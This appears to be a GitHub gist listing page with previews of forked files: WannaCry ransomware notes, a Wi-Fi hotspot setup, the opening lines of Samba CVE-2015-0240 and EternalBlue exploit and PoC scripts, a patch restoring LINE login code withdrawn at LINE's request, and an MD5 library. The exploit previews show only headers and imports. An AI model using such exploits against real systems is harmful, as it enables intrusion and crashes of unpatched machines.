page2me (kitarotao)

@page2me
page2me / wcry.md
Created May 20, 2017 08:34 — forked from anonymous/wcry.md

Ransomware attack hits UK NHS, Spain Telefonica and many other countries

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: Windows 7 is vulnerable. It uses EternalBlue MS17-010 to propagate.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Malware samples

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 and $600. The virus contains code to 'rm' (delete) files. It seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is reachable, the virus exits instead of infecting the host (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. The kill switch will not work if the connection is proxied (source).

update: A minor variant of the viru

@page2me
page2me / create-hotspot.md
Created May 19, 2017 03:08 — forked from narate/create-hotspot.md
Create Wi-Fi Hotspot on Linux using nmcli

Original post : https://unix.stackexchange.com/a/310699

nmcli con add type wifi ifname wlan0 con-name Hostspot autoconnect yes ssid Hostspot
nmcli con modify Hostspot 802-11-wireless.mode ap 802-11-wireless.band bg ipv4.method shared
nmcli con modify Hostspot wifi-sec.key-mgmt wpa-psk
nmcli con modify Hostspot wifi-sec.psk "veryveryhardpassword1234"
@page2me
page2me / cve-2015-0240_samba_exploit.py
Created May 15, 2017 05:06 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd < 3.6.24, in which 'creds' is controlled by the
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value to the 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@page2me
page2me / cve-2015-0240_samba_poc
Created May 15, 2017 05:06 — forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@page2me
page2me / ms17-010-bsod.py
Created May 15, 2017 05:04
eternalblue poc
from impacket import smb
from struct import pack
import sys
'''
PoC to trigger the EternalBlue bug (BSOD)
Reference:
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
'''
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
@page2me
page2me / api.py.patch
Created April 26, 2017 18:48 — forked from windows98SE/api.py.patch
[fix] LINE API function login ( api.py ) / new examples
@@ -55,7 +55,21 @@
After login, make `client` and `client_in` instance
to communicate with LINE server
"""
- raise Exception("Code is removed because of the request of LINE corporation")
+
+ self.transport = THttpClient.THttpClient(self.LINE_HTTP_URL)
+ self.transport_in = THttpClient.THttpClient(self.LINE_HTTP_IN_URL)
+
+ self.transport.setCustomHeaders(self._headers)
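Review bot: the removed `raise Exception("Code is removed because of the request of LINE corporation")` line records that this login code was deliberately withdrawn, so the commit message should state the basis for restoring it. The docstring context above still mentions only `client` and `client_in`; it should also document the new `self.transport` and `self.transport_in` attributes. In the visible added lines `setCustomHeaders(self._headers)` is applied to `self.transport` only; if `self.transport_in` must send the same headers, that call belongs beside it (the hunk header announces 21 new lines but the preview stops after the first few, so this cannot be confirmed from what is shown).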
@page2me
page2me / md5.js
Created April 26, 2017 18:48 — forked from windows98SE/md5.js
JavaScript implementation of the RSA Data Security
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 1.1 Copyright (C) Paul Johnston 1999 - 2002.
* Code also contributed by Greg Holt
* See http://pajhome.org.uk/site/legal.html for details.
*/
/*
* Add integers, wrapping at 2^32. This uses 16-bit operations internally